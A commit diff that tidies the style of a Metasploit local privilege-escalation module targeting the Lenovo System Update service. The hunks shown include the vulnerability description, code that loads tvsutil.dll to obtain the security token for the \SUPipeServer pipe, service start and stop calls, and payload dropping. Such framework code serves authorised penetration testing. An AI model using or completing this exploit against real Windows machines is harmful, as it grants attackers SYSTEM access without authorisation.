Do minor code cleanup
jvazquez-r7
parent
d99eedb1e4
commit
3aa1ffb4f5
|
|
@ -4,32 +4,31 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Local
|
class Metasploit3 < Msf::Exploit::Local
|
||||||
Rank = ExcellentRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
include Msf::Post::Windows::Priv
|
include Msf::Post::Windows::Priv
|
||||||
include Msf::Post::Windows::Services
|
include Msf::Post::Windows::Services
|
||||||
|
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info, {
|
super(update_info(info, {
|
||||||
'Name' => 'Lenovo System Update Privilege Escalation',
|
'Name' => 'Lenovo System Update Privilege Escalation',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The named pipe, \SUPipeServer, can be accessed by normal users to interact
|
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
|
||||||
with the System update service. The service provides the possibility to execute
|
System update service. The service provides the possibility to execute arbitrary
|
||||||
arbitrary commands as SYSTEM if a valid security token is provided. This token can
|
commands as SYSTEM if a valid security token is provided. This token can be generated
|
||||||
be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
|
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
|
||||||
|
System Update is stopped by default but can be started/stopped calling the Executable
|
||||||
Please note that the System Update is stopped by default but can be started/stopped calling
|
ConfigService.exe.
|
||||||
the Executable ConfigService.exe
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Micahel Milvich', # vulnerability discovery, advisory
|
'Micahel Milvich', # vulnerability discovery, advisory
|
||||||
'Sofiane Talmat', # vulnerability discovery, advisory
|
'Sofiane Talmat', # vulnerability discovery, advisory
|
||||||
'h0ng10' # Metasploit module
|
'h0ng10' # Metasploit module
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
|
|
@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
|
|
||||||
def get_security_token(lenovo_directory)
|
def get_security_token(lenovo_directory)
|
||||||
if not client.railgun.get_dll('tvsutil') then
|
unless client.railgun.get_dll('tvsutil')
|
||||||
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
|
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
|
||||||
client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
|
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
|
||||||
end
|
end
|
||||||
|
|
||||||
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
|
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
|
||||||
return dll_response['systeminfo'][0,40]
|
|
||||||
|
dll_response['systeminfo'][0,40]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
su_directory = service_info('SUService')[:path][1..-16]
|
su_directory = service_info('SUService')[:path][1..-16]
|
||||||
print_status("Starting service via ConfigService.exe")
|
print_status('Starting service via ConfigService.exe')
|
||||||
config_service(su_directory, "start")
|
config_service(su_directory, 'start')
|
||||||
print_status("Giving the service some time to start...")
|
|
||||||
sleep(datastore['sleep'])
|
print_status('Giving the service some time to start...')
|
||||||
|
Rex.sleep(datastore['Sleep'])
|
||||||
|
|
||||||
print_status("Getting security token...")
|
print_status("Getting security token...")
|
||||||
token = get_security_token(su_directory)
|
token = get_security_token(su_directory)
|
||||||
vprint_good("Security token is: #{token}")
|
vprint_good("Security token is: #{token}")
|
||||||
|
|
||||||
|
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
|
||||||
if datastore['WritableDir'] and not datastore['WritableDir'].empty?
|
|
||||||
temp_dir = datastore['WritableDir']
|
|
||||||
else
|
|
||||||
temp_dir = get_env('TEMP')
|
temp_dir = get_env('TEMP')
|
||||||
|
else
|
||||||
|
temp_dir = datastore['WritableDir']
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Using #{temp_dir} to drop malicious exe")
|
print_status("Using #{temp_dir} to drop the payload")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
cd(temp_dir)
|
cd(temp_dir)
|
||||||
|
|
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
fail_with(Failure::Unknown, 'Failed to write to pipe')
|
fail_with(Failure::Unknown, 'Failed to write to pipe')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Stopping service via ConfigService.exe")
|
print_status('Stopping service via ConfigService.exe')
|
||||||
config_service(su_directory, "stop")
|
config_service(su_directory, 'stop')
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue